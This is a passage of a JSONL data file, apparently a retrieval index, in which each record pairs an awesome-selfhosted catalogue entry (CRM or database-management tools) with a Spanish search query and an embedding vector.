0.02624, 0.09662, -0.00923, -0.0645, -0.11886, -0.01699, -0.00934, 0.02123, 0.01071, 0.07083, -0.08872, 0.00582, -0.12223, 0.09224, -0.00702, 0.04243, -0.04474, -0.00363, 0.00719, 0.02195, -0.14345, -0.00538, -0.02208, -0.02268, 0.13562, 0.0279, -0.00273, -0.01826, -0.08477, 0.08033, 0.01948, -0.09158, 0.01465, -0.01406, -0.19222, 0.03782, -0.04754, -0.04124, 0.02964, -0.0485, 0.02404, 0.05355, 0.09929, -0.045, 0.00916, 0.03405, 0.11633, -0.0353, 0.00213, 0.01528, -0.08896, -0.06539, 0.01421, 0.06663, 0.03336, 0.0157, 0.07134, -0.04726, -0.03166, 0.1313, 0.03863, 0.01151, -0.03452, -0.0709, -0.02101, -0.04541, 0.12279, 0.02648, 0.01805, 0.11015, 0.00575, -0.0003, -0.0645, 0.05054, 0.10225, -0.11323, -0.04838, -0.06992, 0.00219, -0.02108, 0.00936, 0.02864, -0.04623, -0.07681, 0.14424, -0.05819, -0.02605, 0.16616, -0.06422, 0.06796, 0.14263, -0.1385, 0.06329, -0.04412, -0.01161, -0.0164, -0.0844, 0.03416, -0.0542, -0.01474, -0.05836, -0.03311, -0.01738, 0.05231, -0.02579, 0.01096, -0.02369, -0.02022, -0.02357, -0.02026, -0.02909, -0.01711, 0.04362, -0.01247, 0.13121, 0.01, -0.00699, -0.0795, -0.09881, 0.0601, 0.00349, -0.00462, 0.08682, -0.09444, 0.01924, 0.0895, -0.03522, 0.05317, -0.06055, 0.03218, 0.037, 0.03274, 0.1096, -0.01944, 0.11301, 0.02915, -0.04007, 0.05587, 0.04484, -0.04135, -0.03953, 0.04379, 0.03019, -0.07539, 0.03037, -0.00883, 0.08592, -0.00184, -0.0219, 0.03609, 0.08629, 0.00718, 0.04454, 0.00975, -0.09499, -0.01812, 0.03187, -0.00784, -0.02031, -0.02609, -0.06221, 0.07117, -0.03302, -0.03331, -0.06306, 0.02146, 0.00353, 0.01373, -0.0042, -0.02816, 0.03244, 0.07392, 0.12425, 0.01965, -0.03346, 0.02584, -2e-05, 0.02799, 0.00589, -0.02239, 0.09175, 0.02763, 0.05005, 0.08849, 0.00735, 0.01399, 0.08646, -0.01321, -0.04009, -0.04564, 0.01472, 0.03043, 0.02131, -0.0429, -0.076, -0.06382, -0.04185, 0.01082, 0.0341, 0.00529, 0.00866, -0.00849, 0.00765, -0.01178, 0.03796, 0.07753, -0.08035, -0.03132, 0.02775, -0.03984, 0.07203, -0.01119, -0.0549, -0.01478, -0.01251, 0.01226, -0.06995, -0.00184, 0.01646]} +{"tipo": "pregunta", "herramienta": "Customer Relationship Management (CRM)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Customer Relationship Management (CRM)", "tema": "customer relationship management (crm)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Customer Relationship Management (CRM): Corteza β€” CRM including a unified workspace, enterprise messaging and a low code environment for rapidly and securely delivering records-based management solutions [Apache-2.0, Go]. Django-CRM β€” Analytical CRM with tasks management, email marketing and many more. Django CRM is built for individual use, businesses of any size or freelancers and is designed to provide easy customization and quick development [AGPL-3.0, Python]. EspoCRM β€” CRM with a frontend designed as a single page application, and a REST API [AGPL-3.0, PHP]. Krayin β€” CRM solution for SMEs and Enterprises for complete customer lifecycle management [MIT, PHP]. Monica β€” Personal relationship manager, and a new kind of CRM to organize interactions with your friends and family [AGPL-3.0, PHP/Docker]. SuiteCRM β€” The award-winning, enterprise-class open source CRM [AGPL-3.0, PHP]. Twenty β€” A modern CRM offering the flexibility of open source, advanced features, and a sleek design [AGPL-3.0, Docker].", "indexar": "ΒΏhay algΓΊn programa para gestionar de forma segura los datos y relaciones de mis clientes?", "v": [-0.16443, 0.13862, -0.06124, -0.17851, -0.00169, -0.14243, -0.05461, -0.06509, -0.15628, -0.03834, -0.04273, -0.09503, 0.07976, -0.04752, 0.06435, 0.0097, 0.12936, -0.05267, 0.02862, 0.02799, 0.0042, -0.0409, 0.0495, -0.056, -0.124, -0.04648, 0.08171, -0.02794, -0.03861, 0.11377, 0.07431, -0.06954, -0.02323, -0.03897, 0.01121, 0.15218, -0.03562, 0.07165, 0.06125, -0.05758, -0.01964, -0.14535, 0.02424, -0.01507, 0.13662, 0.05188, -0.10317, -0.07444, 0.0599, -0.06979, -0.14006, -0.03322, -0.05963, -0.07879, 0.0549, -0.07202, -0.00837, -0.08401, 0.09323, 0.02864, -0.04636, -0.01044, 0.04819, 0.06706, 0.05877, -0.04048, 0.14444, -0.04631, -0.0653, 0.06859, -0.01241, -0.00172, -0.05258, 0.04078, 0.06273, -0.03801, 0.08548, 0.10981, -0.06531, 0.02136, -0.07832, 0.06217, -0.03223, 0.05353, -0.05442, 0.03607, 0.07938, 0.00832, -0.06205, 0.02012, 0.10032, 0.02522, -0.09228, -0.04797, 0.0025, 0.02765, -0.01609, -0.08619, -0.03573, 0.03361, -0.00178, 0.01637, -0.07822, 0.1459, -0.08416, 0.07814, 0.06095, -0.04773, 0.00902, 0.02452, -0.07307, 0.00203, -0.01989, -0.05107, -0.09449, 0.00475, 0.00603, -0.00238, 0.0689, -0.02591, -0.11409, -0.05384, 0.08264, 0.04901, 0.04729, 0.01188, -0.00355, 0.15398, -0.00934, 0.11448, -0.08116, -0.00524, -0.06156, -0.07635, 0.07131, -0.01811, -0.02743, 0.00385, 0.02433, -0.128, -0.05135, 0.07783, 0.00057, 0.02845, 0.09607, -0.06781, -0.00568, 0.02522, -0.00407, 0.02378, 0.00973, 0.02511, -0.0024, 0.05327, -0.0575, 0.01846, 0.05678, -0.09762, -0.00872, 0.01932, 0.02691, 0.03344, 0.0361, 0.04802, 0.10874, -0.04186, -0.0293, 0.02819, 0.07176, 0.05398, -0.00193, 0.0241, 0.05724, -0.07119, 0.03279, -0.03934, -0.01999, -0.15379, 0.0042, -0.0175, 0.02389, -0.00907, 0.06706, 0.05085, -0.02152, -0.02601, -0.04648, 0.04959, -0.02307, -0.02023, 0.01821, 0.04229, -0.02856, -0.05229, 0.02007, -0.08877, -0.01737, 0.03908, 0.01062, 0.03531, -0.00576, -0.06842, 0.08189, 0.04802, 0.00509, 0.10356, -0.03689, 0.01483, 0.07944, 0.00682, 0.04074, -0.03657, 0.05836, -0.00605, -0.05316, -0.0906, 0.03265, 0.05257, 0.07082, 0.00163, -0.05054, 0.02317, 0.04999, -0.0167, -0.00737, -0.06587, 0.03108, 0.03719, 0.00544, -0.01895, -0.00627, -0.03041, 0.0146, -0.0236, 0.07155, -0.02137, 0.04014, -0.14184, -0.00063, -0.10891, 0.0413, 0.07158, 0.02856, -0.02413, -0.05929, 0.01504, -0.08306, 0.08903, -0.02795, -0.02094, -0.00192, -0.04138, 0.01464, 0.00357, 0.03106, -0.00852]} +{"tipo": "pregunta", "herramienta": "Customer Relationship Management (CRM)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Customer Relationship Management (CRM)", "tema": "customer relationship management (crm)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Customer Relationship Management (CRM): Corteza β€” CRM including a unified workspace, enterprise messaging and a low code environment for rapidly and securely delivering records-based management solutions [Apache-2.0, Go]. Django-CRM β€” Analytical CRM with tasks management, email marketing and many more. Django CRM is built for individual use, businesses of any size or freelancers and is designed to provide easy customization and quick development [AGPL-3.0, Python]. EspoCRM β€” CRM with a frontend designed as a single page application, and a REST API [AGPL-3.0, PHP]. Krayin β€” CRM solution for SMEs and Enterprises for complete customer lifecycle management [MIT, PHP]. Monica β€” Personal relationship manager, and a new kind of CRM to organize interactions with your friends and family [AGPL-3.0, PHP/Docker]. SuiteCRM β€” The award-winning, enterprise-class open source CRM [AGPL-3.0, PHP]. Twenty β€” A modern CRM offering the flexibility of open source, advanced features, and a sleek design [AGPL-3.0, Docker].", "indexar": "con quΓ© puedo montar un sistema para organizar tareas y enviar campaΓ±as de correo a mis empresas", "v": [0.01424, 0.16796, -0.05361, -0.21815, -0.04355, -0.07959, 0.04852, 0.0448, -0.2103, -0.14985, -0.15043, -0.06644, 0.15341, -0.06894, 0.09298, 0.10467, 0.15505, -0.063, 0.06031, -0.05198, -0.05861, -0.05547, -0.03499, -0.00485, -0.0997, 0.05361, 0.03277, -0.14176, -0.14594, 0.10227, 0.00281, 0.02807, 0.10296, -0.05496, 0.01635, 0.01906, -0.02693, 0.06606, 0.03777, -0.06087, -0.01078, 0.04022, -0.15344, 0.07624, 0.01353, -0.05969, 0.05785, -0.1018, -0.00475, 0.00161, -0.00363, -0.04801, -0.14322, -0.06087, 0.00907, -0.00271, -0.02877, -0.05789, 0.00883, -0.07053, 0.01071, 0.12963, -0.03589, 0.10461, 0.08182, 0.08573, -0.04073, -0.04193, -0.06945, 0.03174, 0.07317, -0.10602, -0.05218, 0.00675, -0.03035, 0.0712, 0.06039, 0.05289, -0.0346, 0.05316, 0.02552, 0.00212, -0.08942, 0.11996, -0.00818, -0.13182, -0.0018, 0.04323, -0.01761, -0.14385, 0.00192, 0.01418, 0.01184, 0.00538, -0.01285, -0.01252, 0.01929, 0.02684, -0.04968, 0.09701, -0.12438, -0.07238, -0.04453, 0.08171, -0.09896, -0.01063, -0.0418, 0.0031, 0.10646, -0.0692, -0.07784, -0.07022, -0.03891, 0.01536, -0.05447, -0.10249, 0.03164, 0.00315, -0.00136, -0.02618, -0.0445, 0.09067, 0.08699, 0.08602, 0.02518, -0.10416, 0.12662, 0.08166, -0.0024, 0.01634, 0.04544, -0.01607, -0.0857, -0.01967, 0.02647, -0.02666, -0.08925, 0.02114, 0.01349, -0.02052, -0.05199, 0.04078, -0.04865, -0.07988, 0.07811, 0.10617, 0.04486, -0.10668, -0.03523, 0.01564, 0.06371, 0.00057, 0.0511, -0.03848, 0.01423, -0.0151, 0.02453, -0.02271, 0.06189, 0.03923, -0.02537, 0.0097, -0.0259, 0.02649, 0.03786, -0.04155, -0.01352, 0.00445, -0.03505, 0.07397, -0.02303, 0.00505, 0.09016, -0.07624, 0.06198, -0.01759, 0.01104, -0.03784, 0.02881, 0.02596, -9e-05, 0.06815, 0.04956, 0.04738, 0.02883, -0.02538, 0.03131, -0.00681, 0.04137, 0.04723, 0.00155, 0.00527, 0.04555, -0.01183, 0.05905, -0.0395, -0.05859, -0.07938, -0.01196, 0.05255, -0.04728, -0.04531, -0.03145, 0.01452, -0.06205, 0.01569, -0.02928, 0.09882, 0.06826, 0.08774, 0.09058, -0.00951, -0.02536, 0.00146, -0.06446, 0.02495, -0.02448, -0.01333, 0.05243, 0.04387, 0.00637, -0.02958, 0.00681, -0.03953, -0.02689, 0.01889, 0.03002, 0.01739, -0.00733, -0.02179, 0.01139, -0.00115, 0.00753, 0.0131, 0.00083, -0.03582, 0.03079, -0.03447, 0.01673, 0.00492, 0.04305, -0.00223, -0.0034, -0.00525, -0.0821, -0.01143, -0.05402, 0.0197, -0.06997, -0.02152, -0.0943, 0.01233, -0.01982, -0.02245, 0.00956, -0.01571]} +{"tipo": "pregunta", "herramienta": "Customer Relationship Management (CRM)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Customer Relationship Management (CRM)", "tema": "customer relationship management (crm)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Customer Relationship Management (CRM): Corteza β€” CRM including a unified workspace, enterprise messaging and a low code environment for rapidly and securely delivering records-based management solutions [Apache-2.0, Go]. Django-CRM β€” Analytical CRM with tasks management, email marketing and many more. Django CRM is built for individual use, businesses of any size or freelancers and is designed to provide easy customization and quick development [AGPL-3.0, Python]. EspoCRM β€” CRM with a frontend designed as a single page application, and a REST API [AGPL-3.0, PHP]. Krayin β€” CRM solution for SMEs and Enterprises for complete customer lifecycle management [MIT, PHP]. Monica β€” Personal relationship manager, and a new kind of CRM to organize interactions with your friends and family [AGPL-3.0, PHP/Docker]. SuiteCRM β€” The award-winning, enterprise-class open source CRM [AGPL-3.0, PHP]. Twenty β€” A modern CRM offering the flexibility of open source, advanced features, and a sleek design [AGPL-3.0, Docker].", "indexar": "cual es una alternativa libre para crear soluciones de gestiΓ³n de registros personalizadas", "v": [0.09355, 0.08423, -0.09313, -0.16865, 0.04146, -0.10218, -0.00569, -0.09131, -0.21145, -0.10098, -0.01453, -0.17173, 0.01793, -0.10392, 0.11774, -0.03178, 0.02561, -0.10843, 0.06362, 0.03599, -0.06089, -0.05479, -0.05978, -0.07165, -0.10125, -0.11605, 0.12291, -0.08102, -0.05439, 0.09041, 0.03524, 0.03708, -0.00764, 0.01651, -0.01153, 0.02052, 0.06037, 0.03938, -0.05125, 0.02626, 0.00591, -0.05411, -0.03126, 0.16953, 0.04504, -0.05648, 0.04974, 0.06687, -0.01791, -0.00026, -0.05833, -0.04371, -0.14032, -0.04563, 0.12576, -0.05437, 0.11367, -0.11861, 0.00221, -0.01838, -0.18793, 0.0713, 0.07199, 0.02008, 0.06087, -0.05789, -0.00656, -0.03298, -0.03019, 0.0296, 0.05995, -0.03371, 0.00652, -0.11605, 0.058, 0.09344, -0.00773, 0.00596, -0.0853, 0.08255, 0.04765, -0.11398, 0.00135, 0.00144, -0.06811, -0.02227, -0.01677, -0.08098, 0.0075, -0.01613, 0.05422, -0.11956, -0.05515, 0.04012, 0.01834, -0.01339, 0.16508, 0.00747, -0.04076, 0.10793, 0.01509, 0.06502, -0.10351, 0.01318, 0.00666, 0.00527, 0.00286, -0.04533, 0.01403, 0.02423, -0.01696, 0.03633, 0.01744, -0.00754, -0.03326, -0.01215, 0.00464, 0.01287, 0.04674, 0.04459, -0.0688, -0.06028, -0.00949, -0.15876, 0.0439, 0.01459, 0.03984, 0.07312, -0.06491, 0.10008, 0.0221, -0.06134, -0.12937, -0.09423, -0.06022, 0.05298, 0.01782, 0.06313, 0.04528, -0.0, -0.02663, 0.0387, -0.01088, -0.04933, 0.01649, -0.06118, -0.0088, -0.00564, -0.04517, 0.02743, 0.02087, -0.03386, 0.02457, 0.10384, -0.11071, 0.06528, -0.07633, -0.02867, -0.08493, 0.0899, 0.00745, 0.01077, -0.03107, 0.06868, 0.02531, -0.05057, 0.01527, 0.0511, -0.00382, 0.0242, 0.00779, 0.03919, 0.03493, -0.09122, 0.08782, -0.04941, -0.00714, -0.14229, 0.03271, -0.04194, -0.04645, 0.00915, -0.02958, -0.02583, 0.00922, -0.11243, 0.01293, 0.01642, 0.02315, 0.04974, 0.00115, -0.00155, -0.05808, -0.11094, -0.00091, 0.02244, 0.04861, -0.07986, -0.06333, -0.04915, -0.03533, -0.00114, -0.01251, -0.04796, -0.04172, 0.01979, -0.12169, 0.07554, 0.08054, 0.02208, 0.02866, 0.0112, 0.06514, 0.01871, -0.06743, 0.01126, -0.02629, -0.04537, 0.0611, -0.04185, 0.03091, 0.03024, 0.02584, 0.00737, 0.01647, 0.04349, 0.04757, 0.02074, -0.0385, 0.03, -0.00469, -0.00453, -0.01969, 0.01261, 0.02311, 0.0333, 0.0383, -0.00264, 0.01537, -0.00787, 0.03825, 0.11554, -0.05401, 0.04409, -0.02867, -0.02396, -0.05213, 0.05626, -0.03327, -0.06737, -0.02307, 0.02865, 0.02531, 0.0248, 0.06579, -0.05329]} +{"tipo": "pregunta", "herramienta": "Database Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Database Management", "tema": "database management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Database Management: Adminer β€” Database management in a single PHP file. Available for MySQL, MariaDB, PostgreSQL, SQLite, MS SQL, Oracle, Elasticsearch, MongoDB and others [Apache-2.0/GPL-2.0, PHP]. Azimutt β€” Visual database exploration made for real world databases (big and messy). Explore your database schema as well as data, document them, extend them and even get analysis and guidelines [MIT, Elixir/Nodejs/Docker]. Baserow β€” Create your own database without technical experience (alternative to Airtable) [MIT, Docker]. Bytebase β€” Safe database schema change and version control for DevOps teams, supports MySQL, PostgreSQL, TiDB, ClickHouse, and Snowflake [MIT, Docker/K8S/Go]. Chartbrew β€” Connect directly to databases and APIs and use the data to create beautiful charts [MIT, Nodejs/Docker]. ChartDB β€” Database diagrams editor that allows you to visualize and design your DB with a single query [AGPL-3.0, Nodejs/Docker]. CloudBeaver β€” Manage databases, supports PostgreSQL, MySQL, SQLite and more. A web/hosted version of DBeaver [Apache-2.0, Docker].", "indexar": "quΓ© programa puedo usar para administrar mis bases de datos desde el navegador", "v": [-0.06213, 0.07991, -0.06549, -0.22038, 0.00823, -0.00895, 0.05444, -0.10491, -0.24172, -0.08336, -0.1137, -0.15756, -0.06904, -0.06989, -0.03208, 0.01642, 0.13844, -0.07812, 0.05148, -0.01427, 0.04493, -0.04254, 0.01606, 0.00085, -0.12776, 0.02412, 0.01295, -0.08404, -0.09672, 0.00353, -0.06555, -0.0143, 0.04561, -0.01941, -0.02026, 0.0585, 0.03443, 0.03427, 0.00363, -0.01239, -0.02, -0.01791, -0.06893, 0.06218, 0.09055, 0.02162, -0.01064, -0.0862, 0.00972, -0.15148, -0.01731, -0.01248, -0.1038, 0.00925, 0.01393, -0.08018, 0.06236, -0.19531, 0.02802, 0.04664, -0.05893, 0.02338, 0.03089, 0.07322, -0.02896, -0.07904, 0.09749, -0.02344, -0.09791, 0.09919, 0.03269, 0.11443, 0.01189, -0.0234, 0.02443, 0.02734, 0.04797, 0.03104, 0.0888, -0.01343, -0.04371, 0.02179, -0.06556, 0.10107, -0.12308, -0.06885, 0.09534, -0.04674, -0.02117, -0.06529, 0.10001, 0.06647, -0.05018, 0.01416, 0.02594, -0.02957, 0.06814, -0.01102, 0.04603, 0.06859, 0.02807, -0.02537, -0.04059, 0.11588, 0.00783, 0.07214, 0.14227, -0.06086, -0.06029, -0.02764, -0.04372, -0.09023, -0.13187, -0.06406, 0.01205, 0.05111, -0.00723, -0.04305, -0.03042, -0.10892, -0.04742, -0.02018, -0.02648, 0.0083, 0.13542, -0.02178, -0.00593, 0.1203, 0.00041, 0.09266, -0.00317, -0.04801, -0.06772, 0.00201, 0.00925, 0.04347, -0.09048, -0.04064, 0.03197, -0.07241, -0.00111, 0.05735, -0.06769, 0.03973, 0.08222, -0.05653, -0.0029, 0.01502, -0.04977, -0.07262, 0.06209, -0.04358, 0.03008, 0.06256, -0.10357, 0.00956, 0.01491, -0.06421, -0.04776, 0.04406, -0.05457, -0.00301, -0.03457, 0.02652, 0.07125, -0.11244, -0.01143, 0.02187, 0.09597, 0.14421, -0.00133, 0.13091, 0.06976, -0.11331, 0.06049, -0.05294, -0.09004, -0.07964, -0.02201, -0.00793, -0.00246, -0.00996, 0.0146, 0.04274, -0.0451, -0.04335, -0.02222, 0.02275, -0.01591, 0.01975, -0.01707, 0.10547, 0.05205, -0.01303, 0.05961, -0.05121, -0.03822, 0.00192, 0.04918, -0.0111, -0.01405, 0.02698, -0.02319, -0.00131, 0.05836, 0.06744, -0.01487, -0.04391, 0.08721, 0.04855, 0.00359, -0.04596, 0.04711, 0.02425, -0.04047, -0.02657, 0.02553, 0.04165, 0.05178, -0.00716, -0.04355, 0.02262, 0.01949, 0.00285, 0.01946, -0.02666, 0.01957, 0.01459, 7e-05, 0.01952, 0.00926, -0.03815, -0.01284, -0.0321, 0.02184, -0.05387, -0.01959, -0.0451, -0.01203, -0.05504, -0.03834, 0.10357, -0.01985, -0.06639, -0.00359, -0.00472, -0.0904, 0.06, -0.01492, -0.03459, -0.05364, 0.01078, 0.04817, -0.06617, -0.01522, 0.03924]} +{"tipo": "pregunta", "herramienta": "Database Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Database Management", "tema": "database management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Database Management: Adminer β€” Database management in a single PHP file. Available for MySQL, MariaDB, PostgreSQL, SQLite, MS SQL, Oracle, Elasticsearch, MongoDB and others [Apache-2.0/GPL-2.0, PHP]. Azimutt β€” Visual database exploration made for real world databases (big and messy). Explore your database schema as well as data, document them, extend them and even get analysis and guidelines [MIT, Elixir/Nodejs/Docker]. Baserow β€” Create your own database without technical experience (alternative to Airtable) [MIT, Docker]. Bytebase β€” Safe database schema change and version control for DevOps teams, supports MySQL, PostgreSQL, TiDB, ClickHouse, and Snowflake [MIT, Docker/K8S/Go]. Chartbrew β€” Connect directly to databases and APIs and use the data to create beautiful charts [MIT, Nodejs/Docker]. ChartDB β€” Database diagrams editor that allows you to visualize and design your DB with a single query [AGPL-3.0, Nodejs/Docker]. CloudBeaver β€” Manage databases, supports PostgreSQL, MySQL, SQLite and more. A web/hosted version of DBeaver [Apache-2.0, Docker].", "indexar": "con quΓ© herramienta puedo explorar y documentar mi esquema de base de datos visualmente", "v": [-0.02496, 0.11889, -0.16576, -0.21724, -0.01093, -0.07546, -0.04905, -0.02007, -0.02604, -0.108, 0.03138, -0.10507, -0.10476, -0.10864, 0.06367, 0.04659, 0.17703, -0.07227, -0.0436, -0.06401, -0.01576, -0.08236, -0.07024, 0.01216, -0.13864, -0.0702, -0.02485, 0.01004, -0.05408, 0.02099, 0.01348, 0.1058, -0.03888, -0.03488, -0.09184, -0.04422, 0.02501, -0.00869, -0.04618, -0.0689, -0.07393, 0.0274, -0.07021, 0.17748, 0.04922, -0.01532, -0.09839, -0.01847, -0.07619, -0.05669, -0.0522, 0.02311, -0.14961, 0.01798, 0.03209, -0.14532, 0.12155, -0.126, 0.17002, 0.11123, -0.06764, -0.03912, -0.0489, -0.03299, 0.01646, -0.05444, 0.07862, -0.03634, -0.04089, 0.09886, -0.02008, 0.04708, -0.00783, 0.01417, -0.02803, 0.01249, 0.04625, -0.06392, 0.03462, 0.01993, 0.00119, -0.01042, -0.03881, 0.12453, -0.11298, -0.0261, 0.0444, 0.02943, 0.03791, -0.11002, 0.00941, 0.0836, -0.05717, 0.05246, 0.0551, 0.05017, 0.05229, 0.00171, -0.0349, 0.04479, 0.03894, 0.02902, -0.05649, 0.09929, 0.09969, 0.06186, 0.03543, 0.03319, -0.17774, 0.00222, -0.02808, -0.00317, -0.1432, -0.0007, 0.00027, -0.03096, -0.05267, -0.0206, -0.03678, -0.07553, 0.07298, 0.09643, -0.07969, -0.10565, 0.03373, -0.07836, -0.0808, 0.09258, 0.02619, 0.02596, 0.06161, 0.03639, -0.05552, 0.0368, 0.08677, 0.00449, -0.02875, -0.14065, 0.00702, -0.07985, 0.00792, -0.00585, 0.00049, 0.01547, 0.04644, -0.03855, 0.0343, 0.03438, -0.07087, 0.0473, -0.06072, -0.02776, 0.06156, 0.03494, 0.00142, 0.07571, 0.07666, -0.02201, -0.11606, 0.00334, 0.03147, -0.00444, -0.03899, -0.00906, 0.04941, -0.0786, 0.00498, 0.00039, -0.00481, 0.0159, 0.00717, -0.00557, 0.08945, -0.02955, 0.03942, -0.07709, -0.06759, -0.09082, -0.06962, -0.036, -0.00643, 0.01786, 0.02346, -0.02619, 0.04157, -0.04472, 0.00238, -0.01104, 0.0544, -0.01136, 0.0142, 0.09587, 0.0902, -0.03255, 0.03108, -0.04345, -0.0123, -0.00267, 0.07631, 0.00042, -0.04472, -0.00347, 0.00513, -0.03652, -0.01276, 0.07967, -0.04905, -0.02914, 0.00729, -0.0091, 0.0179, -0.03763, 0.05698, -0.08659, -0.07029, 0.0025, 0.06119, 0.04297, -0.01511, 0.0004, 0.02213, 0.0647, 0.02218, 0.01302, -0.04511, -0.01802, 0.03342, -0.01074, -0.05299, -0.08274, -0.00879, -0.00946, -0.04378, 0.04218, 0.05382, -0.01573, -0.00927, -0.05395, -0.05463, -0.02795, 0.04427, 0.09242, -0.01304, -0.02837, -0.00759, -0.01581, -0.03316, 0.07285, 0.00206, -0.09861, -0.01916, 0.00542, 0.06618, -0.06783, -0.00867, -0.02836]} +{"tipo": "pregunta", "herramienta": "Database Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Database Management", "tema": "database management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Database Management: Adminer β€” Database management in a single PHP file. Available for MySQL, MariaDB, PostgreSQL, SQLite, MS SQL, Oracle, Elasticsearch, MongoDB and others [Apache-2.0/GPL-2.0, PHP]. Azimutt β€” Visual database exploration made for real world databases (big and messy). Explore your database schema as well as data, document them, extend them and even get analysis and guidelines [MIT, Elixir/Nodejs/Docker]. Baserow β€” Create your own database without technical experience (alternative to Airtable) [MIT, Docker]. Bytebase β€” Safe database schema change and version control for DevOps teams, supports MySQL, PostgreSQL, TiDB, ClickHouse, and Snowflake [MIT, Docker/K8S/Go]. Chartbrew β€” Connect directly to databases and APIs and use the data to create beautiful charts [MIT, Nodejs/Docker]. ChartDB β€” Database diagrams editor that allows you to visualize and design your DB with a single query [AGPL-3.0, Nodejs/Docker]. CloudBeaver β€” Manage databases, supports PostgreSQL, MySQL, SQLite and more. A web/hosted version of DBeaver [Apache-2.0, Docker].", "indexar": "necesito una alternativa libre a Airtable para crear mis propias bases de datos sin experiencia tΓ©cnica", "v": [-0.05528, 0.06344, -0.17011, -0.17223, 0.00266, -0.07841, -0.04363, -0.04478, -0.18228, -0.01504, -0.10013, -0.15049, -0.067, -0.00349, 0.12613, -0.03037, 0.08452, -0.108, 0.19554, -0.02719, -0.0638, -0.03896, -0.12676, -0.05442, -0.06744, -0.05421, 0.00217, -0.08527, -0.14036, 0.11496, -0.03112, 0.05937, 0.07655, -0.0027, -0.00357, -0.00759, 0.05746, 0.01423, -0.00399, -0.10156, -0.02432, 0.00582, -0.0911, 0.1981, 0.08447, -0.01575, -0.02473, 0.02923, -0.05418, 0.05901, 0.02373, 0.0045, -0.07939, -0.04296, 0.03691, -0.13716, 0.18899, -0.15484, 0.00097, 0.00197, -0.12542, -0.00519, 0.11686, 0.02366, 0.02179, 0.01433, 0.03764, -0.02329, -0.04744, 0.08757, 0.00947, 0.08143, 0.0601, -0.12156, -0.06879, -0.04804, 0.02536, 0.01615, -0.07653, -0.01434, 0.00955, 0.03712, -0.03307, 0.01048, -0.07029, -0.06565, 0.14376, -0.00296, 0.04107, -0.01389, 0.11692, 0.01557, -0.01349, 0.06347, 0.03301, 0.03306, 0.01488, 0.00948, 0.00175, 0.0865, 0.00385, -0.03938, -0.04079, -0.02326, 0.02286, 0.04747, 0.03029, -0.01793, -0.07098, -0.03838, -0.10149, -0.02078, 0.00392, 0.01, -0.01525, -0.09499, 0.02347, -0.05996, -0.02991, 0.08593, 0.04934, -0.07646, 0.06086, -0.04266, -0.01239, -0.01646, -0.01278, 0.03391, 0.00944, 0.12992, 0.06011, -0.04526, -0.10602, -0.07433, 0.07977, 0.06314, 0.04264, -0.00392, -0.00963, -0.12023, -0.07767, 0.07627, -0.10964, -0.02134, -0.0221, -0.03093, 0.04493, -0.03232, -0.03625, -0.06023, -0.06712, 0.01104, 0.02833, 0.14613, -0.12351, 0.01516, 0.01572, -0.04517, -0.07529, 0.05899, 0.01505, 0.01221, -0.03415, -0.03936, -0.01551, -0.06099, 0.00285, -0.0421, -0.00923, 0.04765, -0.09273, 0.07107, 0.06365, -0.05766, 0.11482, -0.00949, -0.02749, -0.12763, -0.05976, -0.08101, 0.04602, -0.03833, -0.0219, -0.04043, 0.0356, -0.07852, -0.00061, -0.04199, 0.06987, 0.044, -0.06814, 0.03231, -0.02328, -0.04742, -0.03071, -0.06315, 0.026, -0.04578, 0.00094, 0.03434, -0.06078, 0.0441, -0.04276, -0.0212, -6e-05, -0.01977, -0.02831, 0.02697, 0.00952, -0.04502, 0.04229, -0.02865, 0.02911, -0.00664, 0.00727, 0.00422, 0.03933, -0.00368, 0.02001, -0.02166, 0.0348, 0.03792, 0.02678, 0.01894, 0.00636, -0.01434, 0.01434, 0.04793, -0.00043, -0.00287, 0.06069, 0.00688, 0.05041, 0.01775, 0.06377, -0.00594, 0.01451, 0.0091, 0.02353, -0.02629, 0.02867, 0.08035, -0.02975, -0.02518, -0.0309, -0.01344, -0.06408, 0.04544, -0.02256, -0.05057, 0.00112, -0.0106, 0.03967, -0.0033, 0.00667, -0.0299]} +{"tipo": "pregunta", "herramienta": "Database Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Database Management", "tema": "database management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Database Management: d9 β€” Turn SQL databases into secure APIs through an intuitive admin interface. Data platform and headless CMS (fork of Directus) [GPL-3.0, Nodejs]. Databunker β€” Network-based, self-hosted, GDPR compliant, secure database for personal data or PII [MIT, Docker]. Datasette β€” Explore and publish data with easy import and export and database management [Apache-2.0, Python/Docker]. Evidence β€” Code-based BI tool. Write reports using SQL and markdown and they render as a website [MIT, Nodejs]. LibreDB Studio β€” Browser-based SQL IDE for PostgreSQL, MySQL, Oracle, SQL Server, SQLite, MongoDB and Redis, with an optional AI assistant that writes SQL from natural language (alternative to DataGrip, DBeaver) [MIT, Docker/K8S]. Limbas β€” Database framework for creating database-driven business applications. As a graphical database frontend, it enables the efficient processing of data stocks and the flexible development of comfortable database applications [GPL-2.0, PHP].", "indexar": "que herramienta me ayuda a transformar una base de datos SQL en una API segura con interfaz fΓ‘cil de usar?", "v": [-0.07057, 0.06827, -0.21216, -0.22864, 0.02419, -0.19422, -0.08873, -0.12466, -0.07427, 0.08452, -0.12723, -0.14842, -0.05008, -0.05075, 0.0086, -0.02241, 0.04722, -0.14115, -0.04048, 0.04199, 0.10599, -0.00452, -0.14633, -0.04825, -0.10744, 0.0133, 0.11647, 0.011, -0.11728, -0.02299, -0.06751, -0.05119, -0.00347, 